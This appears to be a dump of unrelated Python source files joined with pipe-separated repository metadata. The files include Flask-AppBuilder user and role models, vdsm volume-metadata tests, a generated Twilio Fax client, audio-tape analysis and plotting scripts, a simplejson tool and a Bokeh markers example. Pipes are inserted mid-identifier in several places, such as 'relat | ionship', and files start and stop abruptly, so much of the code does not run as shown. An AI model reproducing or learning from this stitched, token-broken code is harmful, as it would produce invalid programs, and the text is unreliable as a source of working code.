return subtend_c(c_double(np.radians(theta0)),c_double(np.radians(theta1)),c_double(np.radians(beta0)),c_double(np.radians(beta1)))
|
dpgaspar/Flask-AppBuilder | flask_appbuilder/security/sqla/models.py | Python | bsd-3-clause | 5,212 | 0.001343 | import datetime
from flask import g
from sqlalchemy import (
Boolean,
Column,
DateTime,
ForeignKey,
Integer,
Sequence,
String,
Table,
UniqueConstraint,
)
from sqlalchemy.ext.declarative import declared_attr
from sqlalchemy.orm import backref, relat | ionship
from ... import Model
from ..._compat import as_unicode
_dont_audit = False
class Permission(Model):
__tablename__ = "ab_permission"
id = Column(Integer, Sequence("ab_permission_id_seq"), primary_key=True)
name = Column(String(100), unique=True, nullable=False)
def __repr__(self):
return self.name
class ViewMenu(Model):
__tablename__ = "ab_view_menu"
id = Column(Integer, Sequence("ab_view_menu_id_seq"), primary_key=Tr | ue)
name = Column(String(250), unique=True, nullable=False)
def __eq__(self, other):
return (isinstance(other, self.__class__)) and (self.name == other.name)
def __neq__(self, other):
return self.name != other.name
def __repr__(self):
return self.name
assoc_permissionview_role = Table(
"ab_permission_view_role",
Model.metadata,
Column("id", Integer, Sequence("ab_permission_view_role_id_seq"), primary_key=True),
Column("permission_view_id", Integer, ForeignKey("ab_permission_view.id")),
Column("role_id", Integer, ForeignKey("ab_role.id")),
UniqueConstraint("permission_view_id", "role_id"),
)
class Role(Model):
__tablename__ = "ab_role"
id = Column(Integer, Sequence("ab_role_id_seq"), primary_key=True)
name = Column(String(64), unique=True, nullable=False)
permissions = relationship(
"PermissionView", secondary=assoc_permissionview_role, backref="role"
)
def __repr__(self):
return self.name
class PermissionView(Model):
__tablename__ = "ab_permission_view"
__table_args__ = (UniqueConstraint("permission_id", "view_menu_id"),)
id = Column(Integer, Sequence("ab_permission_view_id_seq"), primary_key=True)
permission_id = Column(Integer, ForeignKey("ab_permission.id"))
permission = relationship("Permission")
view_menu_id = Column(Integer, ForeignKey("ab_view_menu.id"))
view_menu = relationship("ViewMenu")
def __repr__(self):
return str(self.permission).replace("_", " ") + " on " + str(self.view_menu)
assoc_user_role = Table(
"ab_user_role",
Model.metadata,
Column("id", Integer, Sequence("ab_user_role_id_seq"), primary_key=True),
Column("user_id", Integer, ForeignKey("ab_user.id")),
Column("role_id", Integer, ForeignKey("ab_role.id")),
UniqueConstraint("user_id", "role_id"),
)
class User(Model):
__tablename__ = "ab_user"
id = Column(Integer, Sequence("ab_user_id_seq"), primary_key=True)
first_name = Column(String(64), nullable=False)
last_name = Column(String(64), nullable=False)
username = Column(String(64), unique=True, nullable=False)
password = Column(String(256))
active = Column(Boolean)
email = Column(String(64), unique=True, nullable=False)
last_login = Column(DateTime)
login_count = Column(Integer)
fail_login_count = Column(Integer)
roles = relationship("Role", secondary=assoc_user_role, backref="user")
created_on = Column(DateTime, default=datetime.datetime.now, nullable=True)
changed_on = Column(DateTime, default=datetime.datetime.now, nullable=True)
@declared_attr
def created_by_fk(self):
return Column(
Integer, ForeignKey("ab_user.id"), default=self.get_user_id, nullable=True
)
@declared_attr
def changed_by_fk(self):
return Column(
Integer, ForeignKey("ab_user.id"), default=self.get_user_id, nullable=True
)
created_by = relationship(
"User",
backref=backref("created", uselist=True),
remote_side=[id],
primaryjoin="User.created_by_fk == User.id",
uselist=False,
)
changed_by = relationship(
"User",
backref=backref("changed", uselist=True),
remote_side=[id],
primaryjoin="User.changed_by_fk == User.id",
uselist=False,
)
@classmethod
def get_user_id(cls):
try:
return g.user.id
except Exception:
return None
@property
def is_authenticated(self):
return True
@property
def is_active(self):
return self.active
@property
def is_anonymous(self):
return False
def get_id(self):
return as_unicode(self.id)
def get_full_name(self):
return u"{0} {1}".format(self.first_name, self.last_name)
def __repr__(self):
return self.get_full_name()
class RegisterUser(Model):
__tablename__ = "ab_register_user"
id = Column(Integer, Sequence("ab_register_user_id_seq"), primary_key=True)
first_name = Column(String(64), nullable=False)
last_name = Column(String(64), nullable=False)
username = Column(String(64), unique=True, nullable=False)
password = Column(String(256))
email = Column(String(64), nullable=False)
registration_date = Column(DateTime, default=datetime.datetime.now, nullable=True)
registration_hash = Column(String(256))
|
EdDev/vdsm | tests/storage_volume_metadata_test.py | Python | gpl-2.0 | 6,516 | 0 | # Copyright 2016 Red Hat, Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Refer to the README and COPYING files for full details of the license
#
import textwrap
import time
from testlib import make_uuid
from testlib import VdsmTestCase, permutations, expandPermutations
from monkeypatch import MonkeyPatchScope
from vdsm.storage import constants as sc
from vdsm.storage import exception as se
from storage import image, volume
MB = 1024 ** 2
FAKE_TIME = 1461095629
def make_init_params(**kwargs):
res = dict(
domain=make_uuid(),
image=make_uuid(),
puuid=make_uuid(),
size=1024 * MB,
format=sc.type2name(sc.RAW_FORMAT),
type=sc.type2name(sc.SPARSE_VOL),
voltype=sc.type2name(sc.LEAF_VOL),
disktype=image.SYSTEM_DISK_TYPE,
description="",
legality=sc.LEGAL_VOL,
generation=sc.DEFAULT_GENERATION)
res.update(kwargs)
return res
def make_md_dict(**kwargs):
res = {
sc.DOMAIN: 'domain',
sc.IMAGE: 'image',
sc.PUUID: 'parent',
sc.SIZE: '0',
sc.FORMAT: 'format',
sc.TYPE: 'type',
sc.VOLTYPE: 'voltype',
sc.DISKTYPE: 'disktype',
sc.DESCRIPTION: 'description',
sc.LEGALITY: 'legality',
sc.MTIME: '0',
sc.CTIME: '0',
sc.POOL: '',
sc.GENERATION: '1',
}
res.update(kwargs)
return res
def make_lines(**kwargs):
data = make_md_dict(**kwargs)
lines = ['EOF']
for k, v in data.items():
if v is not None:
lines.insert(0, "%s=%s" % (k, v))
return lines
@expandPermutations
class VolumeMetadataTests(VdsmTestCase):
def test_create_info(self):
params = make_init_params()
expected = dict(
CTIME=str(FAKE_TIME),
DESCRIPTION=params['description'],
DISKTYPE=params['disktype'],
DOMAIN=params['domain'],
FORMAT=params['format'],
IMAGE=params['image'],
LEGALITY=params['legality'],
MTIME="0",
POOL_UUID="",
PUUID=params['puuid'],
SIZE=str(params['size']),
TYPE=params['type'],
VOLTYPE=params['voltype'],
GEN=params['generation'])
with MonkeyPatchScope([[time, 'time', lambda: FAKE_TIME]]):
info = volume.VolumeMetadata(**params).legacy_info()
self.assertEqual(expected, info)
def test_storage_format(self):
params = make_init_params(ctime=FAKE_TIME)
expected = textwrap.dedent("""\
CTIME=%(ctime)s
DESCRIPTION=%(description)s
DISKTYPE=%(disktype)s
DOMAIN=%(domain)s
FORMAT=%(format)s
GEN=%(generation)s
IMAGE=%(image)s
LEGALITY=%(legality)s
MTIME=0
POOL_UUID=
PUUID=%(puuid)s
SIZE=%(size)s
TYPE=%(type)s
VOLTYPE=%(voltype)s
EOF
""" % params)
md = volume.VolumeMetadata(**params)
self.assertEqual(expected, md.storage_format())
@permutations([
[sc.DESCRIPTION_SIZE],
[sc.DESCRIPTION_SIZE + 1]
])
def test_long_description(self, size):
params = make_init_params(description="!" * size)
md = volume.VolumeMetadata(**params)
self.assertEqual(sc.DESCRIPTION_SIZE, len(md.description))
@permutations([['size'], ['ctime'], ['mtime']])
def test_int_params_str_raises(self, param):
params = make_init_params(**{param: 'not_an_int'})
self.assertRaises(AssertionError, volume.VolumeMetadata, **params)
@permutations([[key] for key in make_md_dict()
if key not in (sc.POOL, sc.GENERATION)])
def test_from_lines_missing_key(self, required_key):
data = make_md_dict(POOL=None)
data[required_key] = None
lines = make_lines(**data)
self.assertRaises(se.Met | aDataKeyNotFoundError,
volume.VolumeMetadata.from_lines, lines)
@permutations([[None], ['pool']])
def test_deprecated_pool(self, val):
lines = make_lines(**{sc.POOL: val})
md = volume.VolumeMetadata.from_lines(lines)
self.assertEqual("", md.legacy_info()[sc.POOL])
def test_from_lines_invalid_param(self):
| lines = make_lines(INVALID_KEY='foo')
self.assertNotIn("INVALID_KEY",
volume.VolumeMetadata.from_lines(lines).legacy_info())
@permutations([[sc.SIZE], [sc.CTIME], [sc.MTIME]])
def test_from_lines_int_parse_error(self, key):
lines = make_lines(**{key: 'not_an_integer'})
self.assertRaises(ValueError,
volume.VolumeMetadata.from_lines, lines)
def test_from_lines(self):
data = make_md_dict()
lines = make_lines(**data)
md = volume.VolumeMetadata.from_lines(lines)
self.assertEqual(data[sc.DOMAIN], md.domain)
self.assertEqual(data[sc.IMAGE], md.image)
self.assertEqual(data[sc.PUUID], md.puuid)
self.assertEqual(int(data[sc.SIZE]), md.size)
self.assertEqual(data[sc.FORMAT], md.format)
self.assertEqual(data[sc.TYPE], md.type)
self.assertEqual(data[sc.VOLTYPE], md.voltype)
self.assertEqual(data[sc.DISKTYPE], md.disktype)
self.assertEqual(data[sc.DESCRIPTION], md.description)
self.assertEqual(int(data[sc.MTIME]), md.mtime)
self.assertEqual(int(data[sc.CTIME]), md.ctime)
self.assertEqual(data[sc.LEGALITY], md.legality)
self.assertEqual(int(data[sc.GENERATION]), md.generation)
def test_generation_default(self):
lines = make_lines(GEN=None)
md = volume.VolumeMetadata.from_lines(lines)
self.assertEqual(sc.DEFAULT_GENERATION, md.generation)
|
twilio/twilio-python | twilio/rest/fax/v1/fax/__init__.py | Python | mit | 17,574 | 0.002105 | # coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base import deserialize
from twilio.base import serialize
from twilio.base import values
from twilio.base.instance_context import InstanceContext
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
from twilio.base.page import Page
from twilio.rest.fax | .v1.fax.fax_media import FaxMediaList
class FaxList(ListResource):
""" PLEASE NOTE that this class contains beta products that are subject to
change. Use them with caution. """
| def __init__(self, version):
"""
Initialize the FaxList
:param Version version: Version that contains the resource
:returns: twilio.rest.fax.v1.fax.FaxList
:rtype: twilio.rest.fax.v1.fax.FaxList
"""
super(FaxList, self).__init__(version)
# Path Solution
self._solution = {}
self._uri = '/Faxes'.format(**self._solution)
def stream(self, from_=values.unset, to=values.unset,
date_created_on_or_before=values.unset,
date_created_after=values.unset, limit=None, page_size=None):
"""
Streams FaxInstance records from the API as a generator stream.
This operation lazily loads records as efficiently as possible until the limit
is reached.
The results are returned as a generator, so this operation is memory efficient.
:param unicode from_: Retrieve only those faxes sent from this phone number
:param unicode to: Retrieve only those faxes sent to this phone number
:param datetime date_created_on_or_before: Retrieve only faxes created on or before this date
:param datetime date_created_after: Retrieve only faxes created after this date
:param int limit: Upper limit for the number of records to return. stream()
guarantees to never return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, stream() will attempt to read the
limit with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.fax.v1.fax.FaxInstance]
"""
limits = self._version.read_limits(limit, page_size)
page = self.page(
from_=from_,
to=to,
date_created_on_or_before=date_created_on_or_before,
date_created_after=date_created_after,
page_size=limits['page_size'],
)
return self._version.stream(page, limits['limit'])
def list(self, from_=values.unset, to=values.unset,
date_created_on_or_before=values.unset,
date_created_after=values.unset, limit=None, page_size=None):
"""
Lists FaxInstance records from the API as a list.
Unlike stream(), this operation is eager and will load `limit` records into
memory before returning.
:param unicode from_: Retrieve only those faxes sent from this phone number
:param unicode to: Retrieve only those faxes sent to this phone number
:param datetime date_created_on_or_before: Retrieve only faxes created on or before this date
:param datetime date_created_after: Retrieve only faxes created after this date
:param int limit: Upper limit for the number of records to return. list() guarantees
never to return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, list() will attempt to read the limit
with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.fax.v1.fax.FaxInstance]
"""
return list(self.stream(
from_=from_,
to=to,
date_created_on_or_before=date_created_on_or_before,
date_created_after=date_created_after,
limit=limit,
page_size=page_size,
))
def page(self, from_=values.unset, to=values.unset,
date_created_on_or_before=values.unset,
date_created_after=values.unset, page_token=values.unset,
page_number=values.unset, page_size=values.unset):
"""
Retrieve a single page of FaxInstance records from the API.
Request is executed immediately
:param unicode from_: Retrieve only those faxes sent from this phone number
:param unicode to: Retrieve only those faxes sent to this phone number
:param datetime date_created_on_or_before: Retrieve only faxes created on or before this date
:param datetime date_created_after: Retrieve only faxes created after this date
:param str page_token: PageToken provided by the API
:param int page_number: Page Number, this value is simply for client state
:param int page_size: Number of records to return, defaults to 50
:returns: Page of FaxInstance
:rtype: twilio.rest.fax.v1.fax.FaxPage
"""
data = values.of({
'From': from_,
'To': to,
'DateCreatedOnOrBefore': serialize.iso8601_datetime(date_created_on_or_before),
'DateCreatedAfter': serialize.iso8601_datetime(date_created_after),
'PageToken': page_token,
'Page': page_number,
'PageSize': page_size,
})
response = self._version.page(method='GET', uri=self._uri, params=data, )
return FaxPage(self._version, response, self._solution)
def get_page(self, target_url):
"""
Retrieve a specific page of FaxInstance records from the API.
Request is executed immediately
:param str target_url: API-generated URL for the requested results page
:returns: Page of FaxInstance
:rtype: twilio.rest.fax.v1.fax.FaxPage
"""
response = self._version.domain.twilio.request(
'GET',
target_url,
)
return FaxPage(self._version, response, self._solution)
def get(self, sid):
"""
Constructs a FaxContext
:param sid: The unique string that identifies the resource
:returns: twilio.rest.fax.v1.fax.FaxContext
:rtype: twilio.rest.fax.v1.fax.FaxContext
"""
return FaxContext(self._version, sid=sid, )
def __call__(self, sid):
"""
Constructs a FaxContext
:param sid: The unique string that identifies the resource
:returns: twilio.rest.fax.v1.fax.FaxContext
:rtype: twilio.rest.fax.v1.fax.FaxContext
"""
return FaxContext(self._version, sid=sid, )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Fax.V1.FaxList>'
class FaxPage(Page):
""" PLEASE NOTE that this class contains beta products that are subject to
change. Use them with caution. """
def __init__(self, version, response, solution):
"""
Initialize the FaxPage
:param Version version: Version that contains the resource
:param Response response: Response from the API
:returns: twilio.rest.fax.v1.fax.FaxPage
:rtype: twilio.rest.fax.v1.fax.FaxPage
"""
super(FaxPage, self).__init__(version, response)
# Path Solution
self._solution = solution
def get_instance(self, payload):
"""
Build an instance of FaxInstance
:param dict payload: Payload response from the API
:retu |
andreas-schmidt/tapetool | spiegel.py | Python | mit | 3,188 | 0.002823 | #!/usr/bin/env python
from __future__ import print_function
import numpy as np
from scipy.io import wavfile
def lmbinv(i, speed, fs, f1):
f0 = 10.
t1 = 20.
freq = f0 + (f1 - f0) * i / fs / t1
return freq / speed
def f_log(fs, i):
t = float(i) / fs
t1 = 10.
f0 = 20.
f1 = 20000.
return f0 * (f1 / f0)**(t / t1)
def db(x):
return 20 * np.log10(x)
def run(fs, data, speed, length, outfile, f1, ref):
bs = int(fs * length)
norm = data * 1. / np.iinfo(data.dtype).max
bins = range(bs, len(data), bs)
chunked = np.split(norm, bins)
for i, c in enumerate(chunked[:-1]):
rms = np.sqrt(1. * np.sum(c**2, axis=0) / len(c))
print(
i,
lmbinv(bins[i], speed, fs, f1),
*db(rms / ref),
file=outfile)
def logfreq(fs, data, length, outfile, ref):
bs = int(fs * length)
norm = data * 1. / np.iinfo(data.dtype).max
bins = range(bs, len(data), bs)
chunked = np.split(norm, bins)
for i, c in enumerate(chunked[:-1]):
rms = np.sqrt(1. * np.sum(c**2, axis=0) / len(c))
print(
i,
f_log(fs, bins[i]),
*db(rms / ref),
file=outfile)
def tts(fs, t0, t1):
return slice(int(t0 * fs + 1), int(t1 * fs))
def get_reflevel(fs, data, s1):
c = 1. * data[tts(fs, s1 - 1., s1)] / np.iinfo(data.dtype).max
return np.sqrt(1. * np.sum(c**2, axis=0) / len(c))
def main(prefix, s1, s2, s3, title):
fs, data = wavfile.read(prefix + '.wav')
length = .1
ref = get_reflevel(fs, data, s1)
print(prefix, ref)
def r(t0, f1, speed, out):
run(fs,
data[tts(fs, t0, t0 + 20.)],
speed,
length,
open(out, 'w'),
f1,
ref)
t0p = t0 + 21.
reflog = get_reflevel(fs, data, t0p)
logfreq(fs,
data[tts(fs, t0p, t0p + 10.)],
length,
| open('logfreq-' + out, 'w'),
reflog)
r(s1, 2000., .1905, prefix + '-1905.dat')
r(s2, 1000., .0953, prefix + '-0953.dat')
r(s3, 500., .0476, prefix + '-0476.dat')
template = open('template.plt').read()
plt_l = template.format(title='L ' + title, prefix=prefix, col=3)
plt_r = template.format(t | itle='R ' + title, prefix=prefix, col=4)
open(prefix + '-l.plt', 'w').write(plt_l)
open(prefix + '-r.plt', 'w').write(plt_r)
template = open('template-freq.plt').read()
plt_l = template.format(title='L ' + title, prefix=prefix, col=3)
plt_r = template.format(title='R ' + title, prefix=prefix, col=4)
open(prefix + '-lf-l.plt', 'w').write(plt_l)
open(prefix + '-lf-r.plt', 'w').write(plt_r)
if __name__ == '__main__':
main('k-4502', 40.222818, 91.359767, 142.636910,
'4502 Halbspur Woelke')
main('k-5002', 40.224331, 91.363238, 142.645018,
'5002 Halbspur Woelke')
main('k-6002', 25.648929, 76.788175, 128.070287,
'6002 Halbspur Bogen (?)')
main('k-6004', 19.291440, 70.427377, 121.702700,
'6004 Viertelspur Ferrotronic')
main('k-vorb', 40.085222, 91.085239, 142.085246,
'vorband')
|
kactus2/kactus2dev | PythonAPI/ipmm_core_pkg/component.py | Python | gpl-2.0 | 2,871 | 0.009056 |
from ipmm_core_pkg.primitive import Primitive
from ipmm_core_pkg.addressBlock import AddressBlock
from ipmm_core_pkg.register import Register
from ipmm_core_pkg.field import Field
from ipmm_core_pkg.port import Port
from ipmm_core_pkg.parameter import Parameter
class Component(Primitive):
def __init__(self, name, description):
pass
Primitive.__init__(self, name, description)
self.parameters = []
self.ports = []
self.buses = []
self.constants = []
self.signals = []
self.memoryMaps = []
self.behavior = []
self.renderers = []
#TODO: type checkings for add_
def add_parameter(self, parameter):
sel | f.parameters.append(parameter)
def add_port(self, port):
self.ports.append(port)
def add_constant(self, constant):
self.constants.append(constant)
def add_memoryMap(self, memoryMap):
self.memoryMaps.append(memoryMap)
def add_renderer(self, renderer): |
self.renderers.append(renderer)
## render can manipulate (remove, add, modify) parameters, ports, memorymaps
def render(self):
for r in self.renderers:
r()
def printer(self):
Primitive.printer(self)
for p in self.ports:
p.printer()
for c in self.constants:
c.printer()
for mm in self.memoryMaps:
mm.printer()
# Stand-a-lone testing
if __name__ == "__main__":
register_1 = Register("STAT", "Status register.", 2, 32)
field_1 = Field("RX-FIFO", "RX-FIFO Not Empty.", 0, 1, "read-only")
field_2 = Field("RXFIFO_OVFL", "X-FIFO Overflow.", 1, 1, "read-write")
## move this to rgister_if class
port_1 = Port(field_1.get_name()+"_input", "RX-FIFO Not Empty inout", "logic", field_1.get_bitWidth(), "input")
port_2 = Port(field_2.get_name()+"_output", "RX-FIFO Overflow output", "logic", field_2.get_bitWidth(), "output")
register_2 = Register("CMD", "Command register.", 4, 32)
field_3 = Field("Command", "Peripheral Command.", 0, 4, "read-write")
register_1.add_field(field_1)
register_1.add_field(field_2)
register_2.add_field(field_3)
addressBlock_1 = AddressBlock("PP_Address_Block", "Peripheral address block", 32, 32)
addressBlock_1.add_register(register_1)
addressBlock_1.add_register(register_2)
component_1 = Component("Helloder", "This components is Helloder")
component_1.add_port(port_1)
component_1.add_port(port_2)
component_1.add_memoryMap(addressBlock_1)
component_1.printer()
|
e2crawfo/dps | motmetrics/__init__.py | Python | apache-2.0 | 201 | 0.004975 |
from .mot import MOTAccumulato | r
import motmetrics.lap
import motmetrics.metrics
import motmetrics.distances
import motmetrics.io
import motmet | rics.utils
# Needs to be last line
__version__ = '1.1.3' |
ossobv/asterisklint | asterisklint/app/vall/app_softhangup.py | Python | gpl-3.0 | 870 | 0 | # AsteriskLint -- an Asterisk PBX config syntax checker
# Copyright (C) 2019 Walter Doekes, OSSO B.V.
#
# This program is free software: you ca | n redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at you | r option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from ..base import AppBase
class SoftHangup(AppBase):
pass
def register(app_loader):
app_loader.register(SoftHangup())
|
jimyx17/jimh | lib/simplejson/tool.py | Python | gpl-3.0 | 1,025 | 0.000976 | r"""Command-line tool to validate and pretty-print JSON
Usage::
$ echo '{"json":"obj"}' | python -m simplejson.tool
{
"json": "obj"
}
$ echo '{ 1.2:3.4}' | python -m simplejson.tool
Expec | ting property name: line 1 column 2 (char 2)
"""
import sys
import lib.simplejson as json
def main():
if len(sys.argv) == 1:
infile = sys.stdin
outfile = sys.stdout
elif len(sys.argv) == 2:
infile = open(sys.argv[1], 'rb')
outfile = sys.stdout
elif len(sys.argv) == 3:
infile = open(sys.argv[1], 'rb')
outfile = open(sys.argv[2], 'wb')
| else:
raise SystemExit(sys.argv[0] + " [infile [outfile]]")
try:
obj = json.load(infile,
object_pairs_hook=json.OrderedDict,
use_decimal=True)
except ValueError, e:
raise SystemExit(e)
json.dump(obj, outfile, sort_keys=True, indent=' ', use_decimal=True)
outfile.write('\n')
if __name__ == '__main__':
main()
|
flaviovdf/pyksc | src/scripts/col_to_cluster.py | Python | bsd-3-clause | 7,933 | 0.012227 | # -*- coding: utf8
from __future__ import division, print_function
from collections import defaultdict
from matplotlib import pyplot as plt
from radar import radar_factory
from scipy import stats
from scripts import initialize_matplotlib
import numpy as np
import plac
import sys
REFERRER_ABBRV = {
'EXTERNAL':'EXT.',
'FEATURED':'FEAT.',
'INTERNAL':'INT.',
'MOBILE':'MOBI.',
'SEARCH':'SEAR.',
'SOCIAL':'SOC.',
'VIRAL':'VIR.'}
CATEG_ABBRV = {
'Autos&Vehicles':'Vehi.',
'Autos':'Vehi.',
'Comedy':'Com.',
'Education':'Edu.',
'Entertainment':'Ent.',
'Film':'Film',
'Film&Animation':'Film',
'Games':'Game',
'Gaming':'Game',
'Howto':'Howto',
'Howto&Style':'Howto',
'Movies':'Film',
'Music':'Music',
'NULL':'-',
'News':'News',
'News&Politics':'News',
'Nonprofit':'Nonprof.',
'Nonprofits&Activism':'Nonprof.',
'People&Blogs':'People',
'People':'People',
'Pets&Animals':'Pets',
'Pets':'Pets',
'Animals':'Pets',
'Science&Technology':'Sci.',
'Science':'Sci.',
'Tech':'Sci.',
'Shows':'Show',
'Sports':'Sport',
'Trailers':'Film',
'Travel&Events':'Travel',
'Travel':'Travel'}
def load_text_file(features_fpath, col_to_use, classes):
to_plot = defaultdict(lambda: defaultdict(float))
sum_classes = defaultdict(float)
labels = set()
with open(features_fpath) as features_file:
for curr_line, line in enumerate(features_file):
spl = line.split()
if col_to_use >= len(spl):
continue
data = CATEG_ABBRV[line.split()[col_to_use].strip()]
class_num = classes[curr_line]
labels.add(data)
sum_classes[class_num] += 1
to_plot[class_num][data] += 1
return to_plot, sum_classes, sorted(labels)
def load_svm_file(features_fpath, classes):
col_dict = {
'EXTERNAL':13,
'FEATURED':14,
'INTERNAL':15,
'MOBILE':16,
'SEARCH':17,
'SOCIAL':18,
'VIRAL':19
}
to_plot = defaultdict(lambda: defaultdict(float))
sum_classes = defaultdict(float)
labels = set()
with open(features_fpath) as features_file:
curr_line = 0
for line in features_file:
if '#' in line:
for key, id_ in col_dict.items():
print(id_, key, line.split()[id_])
continue
class_num = classes[curr_line]
sum_classes[class_num] += float(line.split()[-1])
for ref_name, col_id in col_dict.items():
ref_abbrv = REFERRER_ABBRV[ref_name]
val = float(line.split()[col_id])
present = val > 0
| if present:
labels.add(ref_abbrv)
to_plot[class_num][ref_abbrv] += val
curr_line += 1
return to_plot, sum_classes, sorted(labels)
def generate_data_plot(to_plot, sum_classes, labels, classes):
num_classes = len(set(classes))
colors = ['b', 'g', 'm', 'y']
total = 0
for class_n | um in xrange(num_classes):
color = colors[class_num]
data_plot = []
for label in labels:
total += to_plot[class_num][label]
data_plot.append(to_plot[class_num][label] / sum_classes[class_num])
yield data_plot, color, class_num
def radar_plot(labels, data_plots, out_fpath):
theta = radar_factory(len(labels))
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1, projection='radar')
for data_plot, color, class_num in data_plots:
ax.plot(theta, data_plot, color=color, label='C%d'%class_num)
ax.fill(theta, data_plot, facecolor=color, alpha=0.25)
ax.set_varlabels(labels)
plt.legend(frameon=False, ncol=4, bbox_to_anchor=(0.5, -0.15),
loc='lower center')
plt.savefig(out_fpath)
def chisq(counts, expected_prob):
counts = np.array(counts)
expected = np.array(expected_prob) * counts.sum()
return stats.chisquare(counts, expected)[1]
def allchisq(to_plot, sum_classes, labels, classes):
num_classes = len(set(classes))
totals = []
for label in labels:
sum_ = 0
for class_num in xrange(num_classes):
sum_ += to_plot[class_num][label]
totals.append(sum_)
probs = []
sum_totals = sum(totals)
for i, t in enumerate(totals):
probs.append( t / sum_totals)
for class_num in xrange(num_classes):
counts = []
for label in labels:
counts.append(to_plot[class_num][label])
chisq(counts, probs)
def stacked_bars(labels, data_plots, out_fpath, label_translation, ref=True):
x_locations = [1, 2, 3, 4, 6, 7, 8, 9, 11, 12, 13, 14, 16, 17, 18, 19]
data_class = {}
data_label = {}
for data, _, class_num in data_plots:
best_idx = np.argsort(data)[::-1][:4]
best_cls = np.array(data)[best_idx]
best_lbl = np.array(labels)[best_idx]
data_class[label_translation[class_num]] = best_cls
data_label[label_translation[class_num]] = best_lbl
bar_data = []
bar_labels = []
for cls in sorted(data_class):
bar_data.extend(data_class[cls])
bar_labels.extend(data_label[cls])
colors = ['b', 'g', 'm', 'r', 'y', 'c', '#A617A1', '#2B5700', 'w',
'#FF7300', 'k'] * 3
colored={}
if ref:
to_use = set(REFERRER_ABBRV.values())
else:
to_use = set(CATEG_ABBRV.values())
for i, l in enumerate(to_use):
colored[l] = colors[i]
for x, y, l in zip(x_locations, bar_data, bar_labels):
c = colored[l]
plt.bar(left=x, height=y, color=c, width=1, alpha=0.5)
plt.text(x + .75, y, l, va='bottom', ha='center', rotation=45)
plt.xlim(xmin=0, xmax=21)
plt.xlabel('Cluster')
if ref:
plt.ylim(ymin=0, ymax=.31)
plt.ylabel('Fraction of Views in Cluster')
else:
plt.ylim(ymin=0, ymax=.4)
plt.ylabel('Fraction of Videos in Cluster')
plt.xticks([3, 8, 13, 18], ['$C0$', '$C1$', '$C2$', '$C3'])
plt.savefig(out_fpath)
@plac.annotations(features_fpath=plac.Annotation('Features file', type=str),
classes_fpath=plac.Annotation('Video classes file', type=str),
out_fpath=plac.Annotation('Plot file', type=str),
trans_fpath=plac.Annotation('Translation of cluster num to labe',
type=str),
col_to_use=plac.Annotation('Column number to use', type=int,
kind='option', abbrev='c'),
is_text_features=plac.Annotation('Indicates file type',
kind='flag', abbrev='t',
type=bool))
def main(features_fpath, classes_fpath, out_fpath,
trans_fpath, col_to_use=2, is_text_features=False):
initialize_matplotlib()
classes = np.loadtxt(classes_fpath)
if is_text_features:
to_plot, sum_classes, labels = \
load_text_file(features_fpath, col_to_use, classes)
ref=False
else:
to_plot, sum_classes, labels = \
load_svm_file(features_fpath, classes)
ref=True
trans = {}
with open(trans_fpath) as f:
for l in f:
spl = l.split()
trans[int(spl[0])] = int(spl[1])
data = generate_data_plot(to_plot, sum_classes, labels, classes)
stacked_bars(labels, data, out_fpath, trans, ref)
#allchisq(to_plot, sum_classes, labels, classes)
if __name__ == '__main__':
sys.exit(plac.call(main))
|
anybox/anybox.buildbot.odoo | anybox/buildbot/openerp/build_utils/analyze_oerp_tests.py | Python | agpl-3.0 | 1,459 | 0 | """Analyse the tests log file given as argument.
Print a report and return status code 1 if failures are detected
"""
import sys
import re
FAILURE_REGEXPS = {
'Failure in Python block': re.compile(r'WARNING:tests[.].*AssertionError'),
'Errors during x/yml tests': re.compile(r'ERROR:tests[.]'),
'Errors or failures during unittest2 tests': re.compile(
r'at least one error occurred in a test'),
'Errors loading addons': re.compile(r'ERROR.*openerp: Failed to load'),
'Critical logs': re.compile(r'CRITICAL'),
'Error init db': re.compile(r'Failed to initialize database'),
'Tests failed to excute': re.compile(
r'openerp.modules.loading: Tests failed to execute'),
'At least one test failed when loading the modules': re.compile(
r'openerp.modules.loading: At least one test '
r'failed when loading the modules.'),
}
test_log = open(sys.argv[1], 'r')
failure | s = {} # label -> extracted line
for line in test_log.readlines():
for label, regexp in FAILURE_REGEXPS.items():
| if regexp.search(line):
failures.setdefault(label, []).append(line)
if not failures:
print "No failure detected"
sys.exit(0)
total = 0
print 'FAILURES DETECTED'
print
for label, failed_lines in failures.items():
print label + ':'
for line in failed_lines:
print ' ' + line
print
total += len(failed_lines)
print "Total: %d failures " % total
sys.exit(1)
|
ericmjl/bokeh | examples/plotting/file/markers.py | Python | bsd-3-clause | 768 | 0.001302 | from numpy.random import random
from bokeh.models.markers import marker_types
from bokeh.plotting import figure, output_file, show
p = figure(title="Bokeh Markers", toolbar_location=None, output_backend="webgl")
p.grid.grid_line_ | color = None
p.background_fill_color = "#eeeeee"
p.axis.visible = False
p.y_range.flipped = True
N = 10
y = 1
for i, marker in enumera | te(marker_types):
x = i % 4
